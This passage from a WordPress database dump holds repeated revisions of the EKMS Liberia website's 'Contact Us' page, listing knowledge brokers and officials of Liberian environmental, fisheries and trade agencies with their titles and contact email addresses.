/>kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 11:43:55','2021-01-18 11:43:55','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3326,42,'2021-01-18 11:43:55','2021-01-18 11:43:55','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 11:43:55','2021-01-18 11:43:55','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3327,42,'2021-01-18 11:43:55','2021-01-18 11:43:55','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 11:43:55','2021-01-18 11:43:55','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3330,42,'2021-01-18 12:01:08','2021-01-18 12:01:08','','kn','','inherit','open','closed','','kn','','','2021-01-18 12:01:08','2021-01-18 12:01:08','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png',0,'attachment','image/png',0),(3331,42,'2021-01-18 12:03:31','2021-01-18 12:03:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:03:31','2021-01-18 12:03:31','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3332,42,'2021-01-18 12:03:31','2021-01-18 12:03:31','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_KT-ogrsfkuhth8i34pwnjn50y0fkk8oqc9g069ccc2ha8.jpg\" title=\"Kawusu Toure\" alt=\"Kawusu Toure\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p><p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a><strong>Francis W. Mwah</strong><br>\nDirector @ MOA<br>\n<a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img 